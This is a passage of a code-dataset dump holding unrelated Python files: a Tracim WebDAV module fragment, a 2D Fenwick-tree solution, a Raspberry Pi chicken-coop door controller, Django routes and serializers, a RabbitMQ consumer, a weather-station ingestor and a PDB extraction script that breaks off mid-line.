str:\n return self.content.get_label_as_file()\n\n def getPreferredPath(self):\n return self.path\n\n def __repr__(self) -> str:\n return \" int:\n return len(self.content_designed)\n\n def getContentType(self) -> str:\n return 'text/html'\n\n def getContent(self):\n filestream = compat.BytesIO()\n\n filestream.write(bytes(self.content_designed, 'utf-8'))\n filestream.seek(0)\n return filestream\n\n def design(self):\n if self.content.type == ContentType.Page:\n return designPage(self.content, self.content_revision)\n else:\n return designThread(\n self.content,\n self.content_revision,\n self.content_api.get_all(self.content.content_id, ContentType.Comment)\n )\n\n\nclass HistoryOtherFile(OtherFile):\n \"\"\"\n A virtual resource corresponding to a specific tracim's revision's page and thread\n \"\"\"\n def __init__(self, path: str, environ: dict, content: data.Content, content_revision: data.ContentRevisionRO):\n super(HistoryOtherFile, self).__init__(path, environ, content)\n self.content_revision = content_revision\n self.content_designed = self.design()\n\n def __repr__(self) -> str:\n return \" str:\n left_side = '(%d - %s) ' % (self.content_revision.revision_id, self.content_revision.revision_type)\n return '%s%s' % (left_side, transform_to_display(self.content_revision.get_label_as_file()))\n\n def getContent(self):\n filestream = compat.BytesIO()\n\n filestream.write(bytes(self.content_designed, 'utf-8'))\n filestream.seek(0)\n\n return filestream\n\n def delete(self):\n raise DAVError(HTTP_FORBIDDEN)\n\n def copyMoveSingle(self, destpath, ismove):\n raise DAVError(HTTP_FORBIDDEN)\n","sub_path":"tracim/tracim/lib/webdav/sql_resources.py","file_name":"sql_resources.py","file_ext":"py","file_size_in_byte":40934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"19230815","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 17 16:16:25 2018\n\n@author: owen\n\"\"\"\n\nclass NumMatrix(object):\n\n def __init__(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n \"\"\"\n # time O(n^2 * (logn)^2)\n self.m, self.n = len(matrix), len(matrix[0])\n self.arr = [[0] * self.n for __ in range(self.m)] # record actual matrix data\n self.BIT = [[0] * (self.n + 1) for __ in range(self.m + 1)]\n for i in range(self.m):\n for j in range(self.n):\n self.update(i, j, matrix[i][j])\n \n\n def update(self, row, col, val):\n \"\"\"\n :type row: int\n :type col: int\n :type val: int\n :rtype: void\n \"\"\"\n # time O((logn)^2)\n delta = val - self.arr[row][col]\n self.arr[row][col] = val\n row_idx = row + 1\n while row_idx <= self.m:\n col_idx = col + 1 # for each row, initialize col\n while col_idx <= self.n:\n self.BIT[row_idx][col_idx] += delta\n col_idx += self.lowbit(col_idx)\n row_idx += self.lowbit(row_idx)\n \n \n def getPrefixSum2D(self, row, col):\n # time O((logn)^2)\n sums = 0\n row_idx = row + 1\n while row_idx > 0:\n col_idx = col + 1\n while col_idx > 0:\n sums += self.BIT[row_idx][col_idx]\n col_idx -= self.lowbit(col_idx)\n row_idx -= self.lowbit(row_idx)\n return sums\n\n def lowbit(self, x): \n return x & -x # last '1' from left\n \n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"\n :type row1: int\n :type col1: int\n :type row2: int\n :type col2: int\n :rtype: int\n \"\"\"\n return self.getPrefixSum2D(row2, col2) - self.getPrefixSum2D(row2, col1 - 1) - self.getPrefixSum2D(row1 - 1, col2) + self.getPrefixSum2D(row1 - 1, col1 - 1)\n\n\n# Your NumMatrix object will be instantiated and called as such:\n# obj = NumMatrix(matrix)\n# obj.update(row,col,val)\n# param_2 = obj.sumRegion(row1,col1,row2,col2)","sub_path":"Range Sum Query 2D - Mutable.py","file_name":"Range Sum Query 2D - Mutable.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"81979936","text":"#!/usr/bin/python3\n\nimport time\nfrom time import sleep\nimport RPi.GPIO as GPIO\nimport datetime\nfrom astral import Location\nimport pytz\nimport settings\n\nimport smtplib\n\n\nID = \"#1\"\nTIMEZONE = pytz.timezone('US/Eastern')\n\n\n## Even GPIO pins are outputs, odd pins are sensors.\nMOTOR_POSITIVE= 12 # Connected to AIN1 on the TB6612 motor driver\nMOTOR_NEGATIVE= 16 # Connected to AIN2 on the TB6612 motor driver\nSWITCH_TOP = 6\nSWITCH_BOTTOM = 13\nPHOTORESISTOR = 5\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(MOTOR_POSITIVE,GPIO.OUT) # Power\nGPIO.setup(MOTOR_NEGATIVE,GPIO.OUT) # Control\nGPIO.setup(SWITCH_BOTTOM, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # Bottom switch\nGPIO.setup(SWITCH_TOP, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # Top switch\nGPIO.setup(PHOTORESISTOR, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # Photoresistor\n\n\nDOOR_TIMEOUT = 120 ## Constant for the maximum length of time the door should take to close.\nLIGHT_DELAY = 600 # Ten minutes\n\n## List of Email adresses to send error emails and updates to:\n#EMAIL_TO = []\n#EMAIL_TO = ['josh@wardensvillegardenmarket.org']\nEMAIL_TO = ['ehhsnerdz@gmail.com']\n#EMAIL_TO = [\"darzgood@gmail.com\"]\n\ndef setLocal():\n # Set timezone and location for Wardensville, WV\n logOutput(\"Setting up the timezone and location for Wardensville, WV...\")\n \n global loc\n loc = Location()\n loc.latitude = 39.084574\n loc.longitude = -78.592021\n loc.timezone = 'US/Eastern'\n \ndef logData(data):\n '''Log time data\n Used only for recording open and close times.'''\n with open(\"/home/pi/Desktop/ChickenCoopDoor/data.log\", \"a\") as datalog:\n datalog.write(data +\"\\n\")\n\ndef logOutput(data):\n '''Log all other info about program status, errors, emails, etc'''\n now = datetime.datetime.now(TIMEZONE).strftime(\"%x %X (%Z)\")\n with open(\"/home/pi/Desktop/ChickenCoopDoor/update.log\", \"a\") as datalog:\n datalog.write(\"{0}:\\t{1}\\n\".format(now,data))\n \n \ndef sendEmail(message):\n gmail_user = settings.gmail_user \n gmail_password = settings.gmail_password\n\n sent_from = gmail_user \n to = EMAIL_TO \n subject = 'Chicken Coop Door Update' \n body = message + \"\\nMessage Sent: \" + datetime.datetime.now(pytz.timezone('US/Eastern')).strftime(\"%x %X (%Z)\")\n\n email_text = '''From: {0}\\nTo: {1}\\nSubject: {2}\\n\\n{3}\\n\\n'''.format(sent_from, \", \".join(to), subject, body)\n\n try: \n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.ehlo()\n server.login(gmail_user, gmail_password)\n server.sendmail(sent_from, to, email_text)\n server.close()\n\n logOutput(\"Email sent: '{0}'\".format(message))\n except: \n logOutput(\"Something went wrong with sending this email: '{0}'\".format(message))\n\n \ndef openDoor(): # Raise the door by powering AIN1 and grounding AIN2\n logOutput(\"Door opening...\")\n \n GPIO.output(MOTOR_POSITIVE,False)\n GPIO.output(MOTOR_NEGATIVE,True)\n sleep(DOOR_TIMEOUT)\n deactivateDoor()\n \n \n now = datetime.datetime.now(TIMEZONE).strftime(\"%x %X (%Z)\")\n #Make the output human friendly\n if (getDoorPosition() == 1): #It opened correctly\n logOutput(\"Door opened at: {0}\".format(now))\n logData(\"Opened: {0}\".format(now))\n sendEmail(\"Chicken coop door {1} opened: {0}\".format(now, ID))\n else:\n logOutput(\"Door Failed to open at: {0}\".format(now))\n logData(\"Failed open: {0}\".format(now))\n sendEmail(\"Alert: Chicken coop door {0} didn't open correctly. Please check it.\".format(ID))\n \ndef closeDoor(): # Lower the door by powering AIN1 and grounding AIN2\n logOutput(\"Door Closing...\")\n \n GPIO.output(MOTOR_POSITIVE,True)\n GPIO.output(MOTOR_NEGATIVE,False)\n sleep(DOOR_TIMEOUT) \n deactivateDoor()\n\n now = datetime.datetime.now(TIMEZONE).strftime(\"%x %X (%Z)\")\n \n if (getDoorPosition() == -1): #It closed correctly\n logOutput(\"Door closed at: {0}\".format(now))\n logData(\"Closed: {0}\".format(now))\n sendEmail(\"Chicken coop door {1} closed: {0}\".format(now, ID))\n else:\n logOutput(\"Door failed to close at: {0}\".format(now))\n logData(\"Failed close: {0}\".format(now))\n sendEmail(\"Alert: Chicken coop door {0} didn't close correctly. Please check it.\".format(ID)) \n \ndef deactivateDoor():\n GPIO.output(MOTOR_POSITIVE, False)\n GPIO.output(MOTOR_NEGATIVE, False)\n\ndef getDoorPosition():\n \"\"\"Read sensors to determine whether the coop door is up or down.\n -1=Down, 1=Up, 0=Unknown \"\"\"\n logOutput(\"Determining door position...\")\n doorPosition = 0 # Assume the door should be closed\n if GPIO.input(SWITCH_TOP):\n logOutput(\"Door found to be open\")\n doorPosition = 1\n elif GPIO.input(SWITCH_BOTTOM):\n logOutput(\"Door found to be closed\")\n doorPosition = -1\n else:\n logOutput(\"Failed to determine door position...\")\n doorPosition = 0\n \n return doorPosition\n\n# Timing methods\n \ndef openTime(date): # Calculate the hour of sunrise\n sunrise = loc.dawn(date = date)\n sunriseTime = sunrise.strftime(\"%x %X (%Z)\")\n return sunrise\n\ndef closeTime(date): # Calculate the hour of sunset\n sunset = loc.dusk(date = date)\n sunsetTime = sunset.strftime(\"%x %X (%Z)\")\n return sunset \n \ndef getNextMoveTime(doorPosition):\n '''\n returns the time for the next action for the door, \n checking to make sure it is the next time and not the previous:\n '''\n \n today = datetime.datetime.now(TIMEZONE)\n tomorrow = today + datetime.timedelta(days=1)\n if (doorPosition == -1): #Door is closed\n oTime = openTime(date=today)\n \n logOutput(\"Tentative open time: \"+oTime.strftime(\"%x %X (%Z)\"))\n if today >= oTime:\n logOutput(\"Oops, that was yesterday's opening time\")\n oTime = openTime(date = tomorrow)\n logOutput(\"Next open time: \" + oTime.strftime(\"%x %X (%Z)\"))\n return oTime\n elif (doorPosition == 1): #Door is open\n \n cTime = closeTime(date = today)\n logOutput(\"Tentative close time: \"+cTime.strftime(\"%x %X (%Z)\"))\n if today >= cTime:\n logOutput(\"Oops, that was yesterday's closing time\")\n cTime = closeTime(date = tomorrow)\n logOutput(\"Next close time: \" + cTime.strftime(\"%x %X (%Z)\"))\n return cTime\n else: \n logOutput(\"Error: getNextMoveTime called without a valid door position\")\n return tomorrow\n \ndef initializeDoorByTime(doorPosition=0):\n \"\"\"\n Set the door to the correct position for the calculated time.\n Run once at boot.\n \"\"\"\n \n now = datetime.datetime.now(TIMEZONE)\n \n oTime = openTime(date=now)\n cTime = closeTime(date=now)\n \n if (now < oTime) or (now > cTime): #Before dawn, after dusk\n if (doorPosition == -1): #Door is already closed\n pass\n else:\n closeDoor()\n doorPosition = -1\n else: # oTime <= now <= cTime: # During daytime\n if (doorPosition == 1): #Door is already open\n pass\n else:\n openDoor()\n doorPosition = 1\n \n return doorPosition\n \n \ndef runByTime(doorPosition):\n '''Activates the chicken coop door based on dawn and dusk calculations \n from on astral.'''\n \n doorPosition = initializeDoorByTime(doorPosition)\n \n if getDoorPosition() == 0: #The door is not recognized at either the up or down positions\n sendEmail(\"Critical Alert: Chicken coop door {0} could not be initialized. \\\nPlease make sure that both the door and the sensors are working correctly. \\\nContinuing with runtime procedure.\".format(ID))\n \n \n while (1):\n now = datetime.datetime.now(TIMEZONE)\n nextMoveTime = getNextMoveTime(doorPosition)\n waitTime = (nextMoveTime-now).total_seconds()\n \n sleep(waitTime)\n \n if doorPosition == 1:\n closeDoor()\n doorPosition = -1\n else:\n openDoor()\n doorPosition = 1\n \n# Light methods\ndef checkAmbientLight():\n return GPIO.input(PHOTORESISTOR)\n \ndef runByLight(doorPosition):\n '''Activates the chicken coop door based on light levels detected.'''\n \n delay = LIGHT_DELAY\n #delay = 60 # Testing purposes: 1 minute\n \n if doorPosition == 0: # Check for an undefined door position\n openDoor()\n doorPosition = 1\n \n while(1):\n lightLevel = checkAmbientLight()\n \n if doorPosition == 1 and checkAmbientLight() == 1: #Door is up and it's light\n pass\n elif doorPosition == -1 and checkAmbientLight() == 0: #Door is down and it's dark\n pass\n \n elif doorPosition == 1 and checkAmbientLight() == 0: #Door is up but it's dark\n logOutput(datetime.datetime.now(TIMEZONE).strftime(\"%x %X (%Z)\")+\" -- It's dark out there\")\n closeDoor()\n doorPosition = -1\n \n elif doorPosition == -1 and checkAmbientLight() == 1: #Door is down but it's light\n logOutput(datetime.datetime.now(TIMEZONE).strftime(\"%x %X (%Z)\")+\" -- It's light out there\")\n openDoor()\n doorPosition = 1\n \n sleep(delay);\n \n \ndef main():\n sendEmail(\"The program for chicken coop door {0} has started! \\\nIf you did not restart it, please check that it is still working correctly. \\\nThe system could be having power issues.\".format(ID))\n setLocal()\n \n doorPosition = getDoorPosition()\n if (doorPosition == 0): #The door is neither up nor down\n sendEmail(\"Alert: The position of chicken coop door {0} could not be determined. Attempting to auto initialize.\".format(ID))\n \n runByTime(doorPosition)\n ## Or...\n #runByLight(doorPosition) \n\ntry:\n main()\n\nexcept (KeyboardInterrupt):\n pass\n\nfinally:\n sendEmail(\"Critical Alert: The program for chicken door {0} has died. Please restart it.\".format(ID))\n GPIO.cleanup()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":10028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"67415858","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('getDynastyList', views.getDynastyList, name='getDynastyList'),\n path('saveDynasty', views.saveDynasty, name='saveDynasty'),\n path('removeDynasty', views.removeDynasty, name='removeDynasty'),\n]\n","sub_path":"dc_history/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"304009111","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer, Serializer\n\nfrom accounting.models import Seller, User, Company\nfrom main.models import Category, Product, Brand, Type\nfrom shopping.models import OrderLine, Order\n\n\nclass CategoryListSerializer(ModelSerializer):\n parent = serializers.SerializerMethodField()\n\n class Meta:\n model = Category\n fields = [\n \"pk\",\n \"title\",\n \"image\",\n \"is_leaf\",\n \"level\",\n \"parent\"\n ]\n\n def get_parent(self, obj):\n if obj.parent:\n return obj.parent.title\n return \"\"\n\n\nclass CategorySerializer(ModelSerializer):\n class Meta:\n model = Category\n fields = [\n \"pk\",\n \"title\",\n \"image\",\n \"parent\"\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n\nclass BrandSerializer(ModelSerializer):\n class Meta:\n model = Brand\n fields = (\n 'title',\n 'id',\n )\n\n\nclass ProductListSerializer(ModelSerializer):\n brand = serializers.SerializerMethodField()\n parent = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n fields = [\n \"pk\",\n \"title\",\n \"price\",\n \"discounted_price\",\n \"image\",\n \"existStatus\",\n \"brand\",\n \"parent\",\n ]\n\n def get_brand(self, obj):\n return obj.brand.title\n\n def get_parent(self, obj):\n return obj.parent.title\n\n\nclass ProductSerializer(ModelSerializer):\n class Meta:\n model = Product\n fields = [\n \"pk\",\n \"title\",\n \"price\",\n \"discounted_price\",\n \"image\",\n \"existStatus\",\n \"brand\",\n \"parent\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n\nclass TypeSerializer(ModelSerializer):\n class Meta:\n model = Type\n fields = (\n 'title',\n 'id',\n )\n\n\nclass SellerListSerializer(ModelSerializer):\n phone_number = serializers.SerializerMethodField()\n first_name = serializers.SerializerMethodField()\n last_name = serializers.SerializerMethodField()\n\n class Meta:\n model = Seller\n fields = [\n \"pk\",\n \"phone_number\",\n \"first_name\",\n \"last_name\",\n \"home_phone\",\n \"address\",\n \"latitude\",\n \"longitude\",\n \"verification_code\",\n ]\n\n def get_phone_number(self, obj):\n return obj.user.username\n\n def get_first_name(self, obj):\n return obj.user.first_name\n\n def get_last_name(self, obj):\n return obj.user.last_name\n\n\nclass SellerSerializer(ModelSerializer):\n phone_number = serializers.CharField(write_only=True)\n first_name = serializers.CharField(write_only=True, required=False, allow_blank=True, default=\"\")\n last_name = serializers.CharField(write_only=True, required=False, allow_blank=True, default=\"\")\n\n class Meta:\n model = Seller\n fields = [\n \"pk\",\n \"phone_number\",\n \"first_name\",\n \"last_name\",\n \"home_phone\",\n \"address\",\n \"latitude\",\n \"longitude\",\n \"verification_code\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n def create(self, validated_data):\n user = User.objects.create(\n is_seller=True,\n username=validated_data.pop('phone_number'),\n first_name=validated_data.pop('first_name'),\n last_name=validated_data.pop('last_name'),\n )\n user.set_password(validated_data['verification_code'])\n user.save()\n seller = Seller.objects.create(user=user, **validated_data)\n return seller\n\n def update(self, instance, validated_data):\n instance.user.username = validated_data.pop('phone_number')\n instance.user.first_name = validated_data.pop('first_name')\n instance.user.last_name = validated_data.pop('last_name')\n instance.user.save()\n return super(SellerSerializer, self).update(instance, validated_data)\n\n\nclass CompanyListSerializer(ModelSerializer):\n username = serializers.SerializerMethodField()\n\n class Meta:\n model = Company\n fields = [\n \"pk\",\n \"username\",\n \"name\",\n ]\n\n def get_username(self, obj):\n return obj.user.username\n\n\nclass CompanySerializer(ModelSerializer):\n username = serializers.CharField(write_only=True)\n password = serializers.CharField(write_only=True)\n\n class Meta:\n model = Company\n fields = [\n \"pk\",\n \"username\",\n \"password\",\n \"name\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n def create(self, validated_data):\n user = User.objects.create(\n is_company=True,\n username=validated_data.pop('username'),\n )\n user.set_password(validated_data.pop('password'))\n user.save()\n company = Company.objects.create(user=user, **validated_data)\n return company\n\n def update(self, instance, validated_data):\n instance.user.username = validated_data.pop('username')\n instance.user.set_password(validated_data.pop('password'))\n instance.user.save()\n return super(CompanySerializer, self).update(instance, validated_data)\n\n\nclass OrderLineSerializer(ModelSerializer):\n class Meta:\n model = OrderLine\n fields = (\n 'id',\n \"amount\",\n \"price\",\n \"product\",\n )\n\n\nclass CreateOrderLineSerializer(Serializer):\n product = serializers.IntegerField()\n amount = serializers.IntegerField()\n\n\nclass OrderListSerializer(ModelSerializer):\n price = serializers.SerializerMethodField()\n owner = serializers.SerializerMethodField()\n\n class Meta:\n model = Order\n fields = [\n \"pk\",\n \"owner\",\n \"created_on\",\n \"status\",\n \"code\",\n \"price\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n def get_price(self, obj):\n sum = 0\n for line in obj.lines.all():\n sum = sum + line.price\n return sum\n\n def get_owner(self, obj):\n return obj.owner.user.username\n\n\nclass OrderRetrieveSerializer(ModelSerializer):\n lines = OrderLineSerializer(many=True)\n\n class Meta:\n model = Order\n fields = [\n \"pk\",\n \"owner\",\n \"created_on\",\n \"status\",\n \"code\",\n \"lines\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n\nclass OrderSerializer(ModelSerializer):\n lines = CreateOrderLineSerializer(write_only=True, many=True)\n\n class Meta:\n model = Order\n fields = [\n \"pk\",\n \"owner\",\n \"status\",\n \"lines\",\n ]\n extra_kwargs = {'pk': {'read_only': True}}\n\n def create(self, validated_data):\n order = Order.objects.create(owner=validated_data.pop('owner'), status=validated_data.pop('status'))\n for line in validated_data.pop('lines'):\n product = Product.objects.get(id=line[\"product\"])\n amount = line[\"amount\"]\n OrderLine.objects.create(order=order, product=product, amount=amount, price=amount * product.price)\n\n return order\n\n def update(self, instance, validated_data):\n request_lines=validated_data.pop('lines')\n\n for order_line in instance.lines.all():\n if order_line.product.id not in [line[\"product\"] for line in request_lines]:\n order_line.delete()\n\n for line in request_lines:\n product = Product.objects.get(id=line[\"product\"])\n amount = line[\"amount\"]\n order_line, created = OrderLine.objects.get_or_create(order=instance, product=product,\n defaults={'amount': amount,\n 'price': amount * product.price})\n if not created:\n order_line.amount=amount\n order_line.price=amount*product.price\n order_line.save()\n\n return super(OrderSerializer, self).update(instance, validated_data)\n","sub_path":"dashboard/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"13515313","text":"\"\"\"消费者\"\"\"\nimport pika\n### 创建socket:获取与rabbitmq服务的连接,虚拟队列需要指定参数 ###\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n### 创建一个AMQP信道(channel) ###\nchannel = connection.channel()\n### 声明队列queue ###\nchannel.queue_declare(queue='hello') # queue名为hello\n### 定义回调处理消息的函数 ###\ndef callback(ch, method, properties, body):\n print(\"[x] Received %r.\"%body)\n print(\"callback各参数意义:\") # ch:channel的实例;method:一些参数;properties:属性\n print(\"ch:{};\\nmethod:{};\\nproperties:{}\\n\".format(ch, method, properties))\n### 消费者消费:告诉rabbitmq,用callback来接收并处理消息 ###\nchannel.basic_consume(queue='hello',\n on_message_callback=callback, # 获取body后执行回调函数\n auto_ack=True) # 自动应答开启,会给MQ服务器发送一个ack:“已经收到了”\nprint(\"[*] Waiting for messages. To eixt press CTAL+C\")\nchannel.start_consuming() # 启动消费模式","sub_path":"rabbitmq/02.direct_consumer.py","file_name":"02.direct_consumer.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"294510090","text":"from utils import *\nimport time\n\ndef firstline_checker(data_type):\n\n info = info_return(data_type)\n if info[\"skip_first\"]:\n print(\"This dataset ({}) originally does not include column header as its 1st line\".format(data_type))\n time.sleep(1)\n \n print(\"\\nFor train.csv, 1st line is :\")\n with open(info[\"path\"]+\"/train.csv\",\"r\") as f:\n for line in f:\n print(line) \n break\n\n print(\"\\nFor test.csv, 1st line is :\")\n with open(info[\"path\"]+\"/test.csv\",\"r\") as f2:\n for line in f2:\n print(line)\n break\n \nif __name__==\"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--data\",type=str,choices=[\"dbpedia\",\"agnews\",\"yahoo\",\"yelp\"])\n args = parser.parse_args()\n \n firstline_checker(args.data)\n \n","sub_path":"paper4/firstline_check.py","file_name":"firstline_check.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"570813981","text":"\"\"\"\nHit cocorah's website API for a listing of stations and add entries for\nanything new found\n\"\"\"\nfrom __future__ import print_function\nimport sys\n\nimport requests\nfrom pyiem.util import get_dbconn\n\n\ndef main():\n \"\"\"Go Main Go\"\"\"\n pgconn = get_dbconn('mesosite')\n mcursor = pgconn.cursor()\n\n state = sys.argv[1]\n\n url = (\"http://data.cocorahs.org/cocorahs/export/\"\n \"exportstations.aspx?State=%s&Format=CSV\"\n \"&country=usa\") % (state,)\n data = requests.get(url, timeout=30).content.decode('ascii').split(\"\\r\\n\")\n\n # Find current stations\n stations = []\n sql = \"\"\"\n SELECT id from stations WHERE network = '%sCOCORAHS' and ST_y(geom) > 0\n and name is not null and name != '' \"\"\" % (state,)\n mcursor.execute(sql)\n for row in mcursor:\n stations.append(row[0])\n\n # Process Header\n header = {}\n h = data[0].split(\",\")\n for i, _h in enumerate(h):\n header[_h] = i\n\n if 'StationNumber' not in header:\n sys.exit(0)\n\n for row in data[1:]:\n cols = row.split(\", \")\n if len(cols) < 4:\n continue\n sid = cols[header[\"StationNumber\"]]\n if sid in stations:\n continue\n\n name = cols[header[\"StationName\"]].strip().replace(\"'\", ' ')\n cnty = cols[header[\"County\"]].strip().replace(\"'\", ' ')\n lat = float(cols[header[\"Latitude\"]].strip())\n lon = float(cols[header[\"Longitude\"]].strip())\n\n if lat < 10 or lon > -60 or name == '':\n continue\n\n print((\"ADD COCORAHS SID:%s Name:%s County:%s %.3f %.3f\"\n ) % (sid, name, cnty, lat, lon))\n\n sql = \"\"\"\n INSERT into stations(id, synop, name, state, country, network,\n online, geom, county, plot_name , metasite)\n VALUES ('%s', 99999, '%s', '%s', 'US', '%sCOCORAHS', 't',\n 'SRID=4326;POINT(%s %s)', '%s', '%s', 'f')\n \"\"\" % (sid, name, state, state, lon, lat, cnty, name)\n try:\n mcursor = pgconn.cursor()\n mcursor.execute(sql)\n mcursor.close()\n pgconn.commit()\n except Exception as _exp:\n mcursor.close()\n pgconn.commit()\n mcursor = pgconn.cursor()\n sql = \"\"\"\n UPDATE stations SET geom = 'SRID=4326;POINT(%s %s)',\n name = '%s', plot_name = '%s'\n WHERE id = '%s' and network = '%sCOCORAHS'\n \"\"\" % (lon, lat, name, name, sid, state)\n mcursor.execute(sql)\n mcursor.close()\n pgconn.commit()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/ingestors/cocorahs/cocorahs_stations.py","file_name":"cocorahs_stations.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"49808810","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls import url\nfrom . import views\n\n\n\nurlpatterns = [\n path('', views.dashboard, name='dashboard'),\n path('academic/', views.academic_year, name='academic_year'),\n path('academic/new', views.academic_new, name='academic_new'),\n\n path('course/', views.course_list, name='course_list'),\n path('course/new', views.course_new, name='course_new'),\n\n path('subject/', views.subject_list, name='subject_list'),\n path('subject/new', views.subject_new, name='subject_new'),\n\n path('semester/', views.semester_list, name='semester_list'),\n path('semester/new', views.semester_new, name='semester_new'),\n\n path('attendence/', views.attendence_select, name='attendence_select'),\n path('attendence/mark', views.attendence_mark, name='attendence_mark'),\n path('attendence/view', views.attendence_view, name='attendence_view'),\n\n path('student/profile/select/', views.student_select, name='student_select'),\n path('student/profile/view/', views.student_profile, name='student_profile'),\n url(r'^student/profile/view/(?P\\d+)/$', views.student_profile_roll, name='student_profile_roll'),\n url(r'^student/profile/edit/(?P\\d+)/$', views.student_profile_edit, name='student_profile_edit'),\n path('student/profile/add/', views.student_profile_add, name='student_profile_add'),\n path('profile/', views.my_profile, name='my_profile'),\n\n path('notification/view/', views.notification_view, name = 'notification_view'),\n url(r'^notification/edit/(?P\\d+)/$', views.notification_edit, name='notification_edit'),\n path('notification/add/', views.notification_add, name = 'notification_add'),\n path('notification/student/view/', views.notification_student_view, name = 'notification_student_view'),\n url(r'^notification/student/edit/(?P\\d+)/$', views.notification_student_edit, name='notification_student_edit'),\n path('notification/student/add/', views.notification_student_add, name = 'notification_student_add'),\n\n path('seminar/add/', views.seminar_add, name = 'seminar_add'),\n #url(r'^seminar/view/(?P\\d+)/$', views.seminar_add, name='seminar_add'),\n\n path('assignment/add/', views.assignment_add, name = 'assignment_add'),\n\n\n path('project/add/', views.project_add, name = 'project_add'),\n #url(r'^assignment/view/(?P\\d+)/$', views.assignment_view, name='assignment_view'),\n\n path('teacher/profile/add', views.teacher_profile_add, name = 'teacher_profile_add'),\n\n\n path('uploads/view/', views.view_uploads, name = 'view_uploads'),\n #url(r'^project/view/(?P\\d+)/$', views.project_view, name='project_view'),\n ]","sub_path":"CloudCampus/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514943256","text":"\"\"\"\r\nPurpose of this is to extract the relevant ATOM lines from the raw pdb/cif files and then save them into a separate pdb files.\r\n\r\nEach pdb file corresponds to a specific chain in each RNA (as per the dataset).\r\n\"\"\"\r\n\r\nimport os\r\n\r\nmain_folder = r'D:\\PHML B factor estimation\\02 Project'\r\ninput_folder = r'01 Download and extract\\01 Raw PDB files'\r\noutput_folder = r'01 Download and extract\\02 Processed PDB files\\C1-C1'\r\nlist_folder = r'00 Basic information'\r\n\r\n# Extract the list of pdb files downloaded\r\ninput_path = os.path.join(main_folder, input_folder)\r\npdb_files_extension = {}\r\nfor file in os.listdir(input_path):\r\n\tname, ext = file.split(\".\")\r\n\tpdb_files_extension[name] = ext\r\n\r\n# Extract the list of RNA proteins required (along with the residue type)\r\nsources = [\"Test_list\", \"Train_list\"]\r\nRNAproteins = []\r\nfor src in sources:\r\n\tlist_path = os.path.join(main_folder, list_folder, src)\r\n\tfile = open(list_path, \"r\").read().split(\"\\n\")[:-1]\r\n\tRNAproteins.extend(file)\r\n\r\n# Split the above proteins and store RNA proteins and its residues in a dictionary\r\nRNAproteins_dict = {}\r\nfor chain in RNAproteins:\r\n\tRNA, residue = chain.split(\"_\")\r\n\tif RNA in RNAproteins_dict:\r\n\t\tRNAproteins_dict[RNA].append(residue)\r\n\t\t# Certain RNA may have multiple residue. Hence, it is attached rather than overwritten\r\n\telse:\r\n\t\tRNAproteins_dict[RNA] = [residue]\r\n\r\n# Extract the required ATOM lines from the pdb files and save them into a separate pdb files\r\nfor chain in list(RNAproteins_dict.keys()):\r\n\tprint(\"Extracting ... %s\" %(chain))\r\n\r\n\t# Check if the pdb file is downloaded. Else, generate an empty pdb file with suffix '_missing'\r\n\tif chain in pdb_files_extension.keys():\r\n\r\n\t\t# This portion is for pdb files\r\n\t\tif pdb_files_extension[chain] == \"pdb\":\r\n\t\t\tfor j in RNAproteins_dict[chain]:\r\n\r\n\t\t\t\t# Generate the input and output file name\r\n\t\t\t\tinput_filename = chain + \".pdb\"\r\n\t\t\t\toutput_filename = \"Extract_pdb_\" + chain + \"_\" + j + \".pdb\"\r\n\r\n\t\t\t\t# Input and output path\r\n\t\t\t\tinput_path = os.path.join(main_folder, input_folder, input_filename)\r\n\t\t\t\toutput_path = os.path.join(main_folder, output_folder, output_filename)\r\n\r\n\t\t\t\toldfile = open(input_path, \"r\")\r\n\t\t\t\tnewfile = open(output_path,\"w\")\r\n\r\n\t\t\t\t# Extract the residue lines\r\n\t\t\t\tfor line in oldfile:\r\n\t\t\t\t\tif line:\r\n\t\t\t\t\t\tif line[0:4] == \"ATOM\" and line[21] == j and line[13:16] == 